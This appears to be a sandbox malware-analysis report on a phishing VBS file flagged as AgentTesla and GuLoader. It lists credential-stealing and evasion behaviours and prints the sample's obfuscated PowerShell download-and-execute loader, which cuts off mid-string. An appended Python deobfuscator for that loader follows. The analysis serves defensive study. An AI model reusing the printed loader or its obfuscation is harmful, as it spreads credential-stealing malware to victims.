Windows
Analysis Report
Zapytanie ofertowe (GASTRON 07022024).vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
  - wscript.exe (PID: 5532, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zapytanie ofertowe (GASTRON 07022024).vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
    - powershell.exe (PID: 4704, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFa oUnzMii Cl MulHeas / a5Fi.,a0 C la(suWS.i AgnPaddio ,w TsPa ,e NHoTJ Op1S u0H,.A,0.w ;Go KWPii BnAl6 B4,n ;Co ,yx,e6 E4E.;Ds T ir Gv a: A 1Ca2S,1.i. Ar0Mu) R S ,GLieGicSp k AoR /I,2 S0P 1Ek0T i0.n1Az0Sk 1,e GrFUri l rreeJ f EoDaxT /Sa 1An2Fa1 .P a0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko /Bi/Bedt.r Nyi ,vDoeP r.SugEpoBe o PgMilSle D.,hc WoM mPr/.au P c B? neL.x epNooB.r BtPh=Dod.k oShwSen,al Beo Da Sd a&A,ia,d u =D 1.alUnB ._UbMBypS kg ,j -,iW SuW.ye RK, eK XAaPLoO .EGrBubmO uL .yN.iBr Kba3,rMS S SwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM, hEuo K .a% Isa ap TpE fdPraFotJo aVa%Sy\SqV eeA iMen. alGee asHo sT..OmD Si Y,s G Jo&S p&Gi PneBu cSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ C gOblProFob SaUflMa:C .U dEusAmk R,rBoiArfB it FsTys b i .dTne Ur s n e sUn= P(UncStmF odKl .k/,e cKo Gr$,hW Si .eSknB ,eNorBlb B rUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'C h$ egz lF oTub.laMal ,a:ShPS.oG arPasNoeTh sP n Famop Res,s=,a$, nSNopheyG tEus.ulSti Vrk .k neH rToeA.nRa . SsT.pUnl HyiShtKu(F o$DiMDeiD, sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e .otPr. SHi ererL.vOvi ,ocmiep,P IoFliRen m tViM .aLen TraN,g Fe SrV,]Wa:Ma
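The PowerShell stage launched by wscript.exe above hides every operational string behind one routine: Stemmetllerens increments $suballocating from $null to 1, then loops For($i=2; $i -lt $s.Length-1; $i+=3) and concatenates $s.Substring($i, 1), so a literal decodes to every third character starting at index 2 with the final character dropped. The Pharmacist function then runs & ($Breakneck) on each decoded string, and $Breakneck itself decodes to the command it invokes. As an added example (a re-implementation for static analysis, not code from the report or from the sample), the Python below reproduces the decoder and applies it to the Stemmetllerens calls found in a script fragment. The fragment is constructed for this example from three literals in the process tree: 'Ar> P ' and ',niVieTux.o ' exactly as they appear in the report, and 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ', which is the $Forgelser literal with the report's ten-character column wrap removed (that the wrap inserts a space every ten characters is an assumption about the extraction, supported by the literal decoding to a meaningful header name).

```python
import re

# Decoder equivalent to the sample's Stemmetllerens function.
# In the script $suballocating is undefined ($null) until "$suballocating++"
# runs, which sets it to 1, so the loop the sample executes is
#   For($i = 2; $i -lt $s.Length - 1; $i += 3) { $out += $s.Substring($i, 1) }
# i.e. every third character from index 2, never reading the last character.
def stemmetllerens(literal, first=2, stride=3, trailing=1):
    bound = len(literal) - trailing
    return "".join(literal[i] for i in range(first, bound, stride))


# $Name=Stemmetllerens '...'  (single-quoted PowerShell literal; the sample's
# literals never contain the '' escape, so a plain [^']* body is sufficient)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*Stemmetllerens\s+'([^']*)'")
# Any Stemmetllerens '...' call, whether assigned or passed to Pharmacist (...)
CALL_RE = re.compile(r"Stemmetllerens\s+'([^']*)'")
# The call operator applied to a variable, as in: & ($Breakneck) ($Unmicaceous)
CALL_OP_RE = re.compile(r"&\s*\(\s*\$(\w+)\s*\)")


def decoded_variables(script):
    """Map each $Var assigned from a Stemmetllerens call to its decoded value."""
    return {name: stemmetllerens(lit) for name, lit in ASSIGN_RE.findall(script)}


def decoded_calls(script):
    """Decode every Stemmetllerens literal in order of appearance."""
    return [stemmetllerens(lit) for lit in CALL_RE.findall(script)]


def resolve_call_operator(script):
    """Return what '& ($Var)' resolves to, i.e. the command Pharmacist runs."""
    variables = decoded_variables(script)
    match = CALL_OP_RE.search(script)
    return variables.get(match.group(1)) if match else None


# Constructed fragment: three literals from the report's process tree plus the
# Pharmacist definition (the $Forgelser literal has the column wrap removed).
SAMPLE = (
    "$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';"
    "$Misevaluate=Stemmetllerens 'Ar> P ';"
    "$Breakneck=Stemmetllerens ',niVieTux.o ';"
    "function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}"
)

if __name__ == "__main__":
    for name, value in decoded_variables(SAMPLE).items():
        print(f"${name} = {value!r}")
    print("Pharmacist invokes:", resolve_call_operator(SAMPLE))
```

Run against the fragment, the three variables come out as User-Agent, > and iex, and & ($Breakneck) resolves to iex, so every Pharmacist (...) call is an Invoke-Expression of a decoded string. The remaining literals in the report (the $Banjernes and $Spytslikkeren strings, $Wienerbrdsstang and the three Pharmacist arguments) need the unwrapped originals before the same decoder can be applied: the column wrap in the report collapses adjacent spaces, so their exact contents cannot be recovered from this page, and the last call is truncated.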